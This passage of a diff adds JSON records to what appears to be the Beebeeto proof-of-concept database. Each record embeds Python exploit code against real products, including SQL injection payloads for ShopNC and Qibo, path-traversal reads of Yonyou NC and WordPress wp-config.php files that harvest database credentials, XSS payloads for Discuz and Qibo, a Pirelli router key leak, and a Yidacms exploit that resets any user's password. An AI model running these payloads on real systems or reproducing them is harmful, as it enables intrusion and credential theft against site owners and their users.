pprint(mp.run())", "desc": "Wordpress:\u5c0f\u4e8e2.4\u7248\u672c\u7684Pods\u63d2\u4ef6\u4e2d<a>\u6807\u8bb0\u672a\u95ed\u5408\uff0c\u5bfc\u81f4HTTP GET\u53c2\u6570\u6570\u636e\u4e2d\uff0c\u53ef\u4ee5\u4ea7\u751f\u53cd\u5c04\u578b\u7684xss\u6f0f\u6d1e\u3002", "app_name": "WordPress", "id": "poc-2015-0010", "layer4_protocol": null}
+{"create_date": "2015-01-15 14:20:07", "name": "\u7528\u53cbNC /hrss/ELTextFile.load.d \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u7528\u53cb\u6f0f\u6d1e,Yonyou\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/hrss/ELTextFile.load.d", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0008',\r\n            'name': '\u7528\u53cbNC /hrss/ELTextFile.load.d \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2015-01-14',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u7528\u6709',\r\n            'vul_version': ['NC'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['\u7528\u53cb\u6f0f\u6d1e', 'Yonyou\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/hrss/ELTextFile.load.d'],\r\n            'desc': '../../ierp/bin/prop.xml',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-066512',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = '%s/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml' % args['options']['target']\r\n        req = urllib2.Request(verify_url)\r\n        content = urllib2.urlopen(req).read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        if 'enableHotDeploy' in content and 'internalServiceArray' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "../../ierp/bin/prop.xml", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0008", "layer4_protocol": null}
+{"create_date": "2015-01-14 17:28:57", "name": "ShopNc v6.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "ShopNc\u6f0f\u6d1e,ShopNcSQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0007',\r\n            'name': 'ShopNc v6.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2015-01-14',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'ShopNc',\r\n            'vul_version': ['6.0'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['ShopNc\u6f0f\u6d1e', 'ShopNcSQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n            'desc': '''\r\n                    Site footer:\r\n                        ShopNC\u00ae*******\u79d1\u6280\u6709\u9650\u516c\u53f8\r\n                        Copyright\u00a9 2007-2009 ShopNC, Powered by ShopNC Team\r\n                    ''',\r\n            'references': ['http://0day5.com/archives/1218',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        fake_headers = ForgeHeaders().get_headers()\r\n        fake_headers['Referer'] = (\"http://baidu.com'and(select 1 from(select count(*),concat(\"\r\n                                   \"floor(rand(0)*2),0x3a,(select(select(SELECT md5(233333)))\"\r\n                                   \"from information_schema.tables limit 0,1))x from information_schema\"\r\n                                   \".tables group by x)a) and 1=1)#\")\r\n        verify_url = args['options']['target']\r\n        req = urllib2.Request(verify_url, headers=fake_headers)\r\n        content = urllib2.urlopen(req).read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        if 'fb0b32aeafac4591c7ae6d5e58308344' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['headers_referer'] = fake_headers['Referer']\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Site footer:\r\n    ShopNC\u00ae*******\u79d1\u6280\u6709\u9650\u516c\u53f8\r\n    Copyright\u00a9 2007-2009 ShopNC, Powered by ShopNC Team", "app_name": "ShopNC", "id": "poc-2015-0007", "layer4_protocol": null}
+{"create_date": "2015-01-08 01:40:01", "name": "Pirelli ADSL2/2+ Wireless Router P.DGA4001N \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Pirelli\u8def\u7531\u6f0f\u6d1e,Pirelli\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/wlsecurity.html", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0004',\r\n            'name': 'Pirelli ADSL2/2+ Wireless Router P.DGA4001N \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2015-01-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Pirelli',\r\n            'vul_version': ['ADSL2/2+'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Pirelli\u8def\u7531\u6f0f\u6d1e', 'Pirelli\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/wlsecurity.html'],\r\n            'desc': 'Tested on firmware version PDG_TEF_SP_4.06L.6',\r\n            'references': ['http://www.exploit-db.com/exploits/35721/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = \"%s/wlsecurity.html\" % args['options']['target']\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"var wpaPskKey = '\" in content or \"var sessionKey\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Tested on firmware version PDG_TEF_SP_4.06L.6", "app_name": "Other", "id": "poc-2015-0004", "layer4_protocol": null}
+{"create_date": "2015-01-04 16:09:57", "name": "\u9f50\u535a\u5730\u65b9\u95e8\u6237\u7cfb\u7edf /coupon/s.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tomato", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u9f50\u535a\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/coupon/s.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0002',\r\n            'name': '\u9f50\u535a\u5730\u65b9\u95e8\u6237\u7cfb\u7edf /coupon/s.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'Tomato',\r\n            'create_date': '2015-01-02',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Qibo',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u9f50\u535a\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/coupon/s.php', 'php'],\r\n            'desc': '\u95ee\u9898\u51fa\u5728\u9f50\u535a\u641c\u7d22\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662f\uff1ahttp://life.qibosoft.com/coupon/s.php',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-079938',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20union%20select%20md5(1),2,3,4,5,6,7,8,9%23\"\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"c4ca4238a0b923820dcc509a6f75849b\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u95ee\u9898\u51fa\u5728\u9f50\u535a\u641c\u7d22\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662f\uff1ahttp://life.qibosoft.com/coupon/s.php", "app_name": "qibocms", "id": "poc-2015-0002", "layer4_protocol": null}
+{"create_date": "2015-01-01 00:37:47", "name": "Discuz! 7.2 /admincp.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/admincp.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0001',\r\n            'name': 'Discuz! 7.2 /admincp.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-12-31',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['7.2'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Discuz\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/admincp.php', 'php'],\r\n            'desc': 'Cross site scripting has benn found on /admincp.php file.',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-084097',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/admincp.php?infloat=yes&handlekey=123);alert(/bb2/);//\"\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"if($('return_123);alert(/bb2/);//'\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Cross site scripting has benn found on /admincp.php file.", "app_name": "Discuz", "id": "poc-2015-0001", "layer4_protocol": null}
+{"create_date": "2014-12-29 16:47:00", "name": "WordPress Multiple themes /download.php Arbitrary File Download POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Lyleaks", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress\u63d2\u4ef6\u6f0f\u6d1e,Themes,Arbitrary File Download,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0222',\r\n            'name': 'WordPress Multiple themes /download.php Arbitrary File Download POC',\r\n            'author': 'Lyleaks',\r\n            'create_date': '2014-12-29',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Wordpress',\r\n            'vul_version': ['*'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['Wordpress\u63d2\u4ef6\u6f0f\u6d1e', 'Themes', 'Arbitrary File Download', 'php'],\r\n            'desc': '\"download_file\" variable is not sanitized.',\r\n            'references': ['http://packetstormsecurity.com/files/129706/wptheme-download.txt',\r\n          ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = [\r\n            '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',\r\n            '/wp-content/force-download.php?file=../wp-config.php',\r\n            '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php',\r\n            '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php',\r\n            '/wp-content/themes/markant/download.php?file=../../wp-config.php',\r\n            '/wp-content/themes/yakimabait/download.php?file=./wp-config.php',\r\n            '/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php',\r\n            '/wp-content/themes/felis/download.php?file=../wp-config.php',\r\n            '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php',\r\n            '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'\r\n            '/wp-content/themes/epic/includes/download.php?file=wp-config.php',\r\n            '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php',\r\n            '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php',\r\n            '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php',\r\n            '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php',\r\n            '/wp-content/themes/lote27/download.php?download=../../../wp-config.php',\r\n            '/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php',\r\n            '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php',\r\n            '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'\r\n        ]\r\n        args['poc_ret']['file_path'] = []\r\n        for filename in payload:\r\n            verify_url = args['options']['target'] + filename\r\n            if args['options']['verbose']:\r\n                print '[*] Request URL: ' + verify_url\r\n            try:\r\n                req = urllib2.Request(verify_url)\r\n                content = urllib2.urlopen(req).read()\r\n            except:\r\n                continue\r\n            if 'DB_PASSWORD' in content and 'DB_USER' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['file_path'].append(verify_url)\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n            args['success'] = False\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\"download_file\" variable is not sanitized.", "app_name": "WordPress", "id": "poc-2014-0222", "layer4_protocol": null}
+{"create_date": "2014-12-27 16:03:46", "name": "Qibo Information V1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Qibo\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0219',\r\n            'name': 'Qibo Information V1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'user1018',\r\n            'create_date': '2014-12-27',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Qibo',\r\n            'vul_version': ['v1'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Qibo\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.php', 'php'],\r\n            'desc': '''\r\n                    \u7531\u4e8e\u5168\u5c40\u53d8\u91cf\u53ef\u63a7\uff0c\u901a\u8fc7\u63a7\u5236\u53d8\u91cf\u53ef\u4ee5\u8fdb\u884c\u53cd\u5c04\u578b XSS\u3002\r\n                    ''',\r\n            'references': ['N/A'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/search.php?module_db[]=<iframe/onload=alert(bb2)><!--'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<iframe/onload=alert(bb2)><!--' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u7531\u4e8e\u5168\u5c40\u53d8\u91cf\u53ef\u63a7\uff0c\u901a\u8fc7\u63a7\u5236\u53d8\u91cf\u53ef\u4ee5\u8fdb\u884c\u53cd\u5c04\u578b XSS\u3002", "app_name": "qibocms", "id": "poc-2014-0219", "layer4_protocol": null}
+{"create_date": "2014-12-27 15:40:05", "name": "Yidacms v3.2 /Yidacms/user/user.asp \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539", "tag": "Yidacms\u6f0f\u6d1e,Yidacms\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport requests\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0217',\r\n            'name': 'Yidacms v3.2 /Yidacms/user/user.asp \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e Exploit',\r\n            'author': 'user1018',\r\n            'create_date': '2014-12-27',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Yidacms',\r\n            'vul_version': ['3.2'],\r\n            'type': 'Remote Password Change',\r\n            'tag': ['Yidacms\u6f0f\u6d1e', 'Yidacms\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e', 'asp'],\r\n            'desc': '\u91cd\u7f6e\u5bc6\u7801\u65f6\u6ca1\u6709\u5bf9\u5e10\u53f7\u548c\u539f\u5bc6\u7801\u8fdb\u884c\u6821\u9a8c,\u5bfc\u81f4\u53ef\u4ee5\u4efb\u610f\u91cd\u7f6e\u4efb\u4f55\u7528\u6237\u5bc6\u7801',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-073901',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        vul_path = '%s/user/user.asp?yidacms=password&id=3'\r\n        verify_url = vul_path % args['options']['target']\r\n\r\n        data = {\r\n            'shuaiweb_userpass':'test@beebeeto.com',\r\n            'shuaiweb_userpass2':'test@beebeeto.com',\r\n            'shuaiweb_useremail':'test@beebeeto.com',\r\n            'shuaiweb_username': urllib.unquote('%CE%D2%B7%AE%BB%AA'),\r\n            'shuaiweb_usertel': '',\r\n            'shuaiweb_userqq': '',\r\n            'shuaiweb_usermsn': '',\r\n            'shuaiweb_useraddress': ''\r\n        }\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n\r\n        response = requests.post(verify_url, data=data)\r\n        content = response.content\r\n        if u'alert(\\'\u4fee\u6539\u6210\u529f\uff01\\');location.replace(\\'user_pass.asp\\')' in content.decode('GBK'):\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['password'] = 'test@beebeeto.com'\r\n        return args\r\n\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u91cd\u7f6e\u5bc6\u7801\u65f6\u6ca1\u6709\u5bf9\u5e10\u53f7\u548c\u539f\u5bc6\u7801\u8fdb\u884c\u6821\u9a8c,\u5bfc\u81f4\u53ef\u4ee5\u4efb\u610f\u91cd\u7f6e\u4efb\u4f55\u7528\u6237\u5bc6\u7801", "app_name": "yidacms", "id": "poc-2014-0217", "layer4_protocol": null}
+{"create_date": "2014-12-22 17:32:12", "name": "Misfortune Cookie(CVE-2014-9222) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "e3rp4y", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Misfortune Cookie,RomPager,\u5384\u8fd0Cookie\u6f0f\u6d1e,CVE-2014-9222", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\nfrom distutils.version import LooseVersion\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0215',\r\n            'name': 'Misfortune Cookie(CVE-2014-9222) POC',\r\n            'author': 'e3rp4y',\r\n            'create_date': '2014-12-22',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Route',\r\n            'vul_version': ['<=4.34'],\r\n            'type': 'Other',\r\n            'tag': ['Misfortune Cookie', 'RomPager', '\u5384\u8fd0Cookie\u6f0f\u6d1e', 'CVE-2014-9222'],\r\n            'desc': '\u653b\u51fb\u8005\u80fd\u591f\u5229\u7528Misfortune Cookie\u6f0f\u6d1e, \u5c06\u5e26\u6709\u653b\u51fb\u8d1f\u8f7d\u7684cookie\u53d1\u9001\u5230\u670d\u52a1\u7aef, \u83b7\u53d6\u7ba1\u7406\u5458\u63a7\u5236\u6743\u9650',\r\n            'references': [\r\n                'http://mis.fortunecook.ie/',\r\n                'https://news.ycombinator.com/item?id=8770662',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = '%s/Allegro' % args['options']['target']\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        ver = re.findall('RomPager Advanced Version (\\d+\\.\\d+)<br>', content)\r\n        if ver and '<title>Allegro Copyright</title>' in content:\r\n            if LooseVersion(ver[0]) < LooseVersion('4.34'):\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n            else:\r\n                args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u653b\u51fb\u8005\u80fd\u591f\u5229\u7528Misfortune Cookie\u6f0f\u6d1e, \u5c06\u5e26\u6709\u653b\u51fb\u8d1f\u8f7d\u7684cookie\u53d1\u9001\u5230\u670d\u52a1\u7aef, \u83b7\u53d6\u7ba1\u7406\u5458\u63a7\u5236\u6743\u9650", "app_name": "Other", "id": "poc-2014-0215", "layer4_protocol": null}
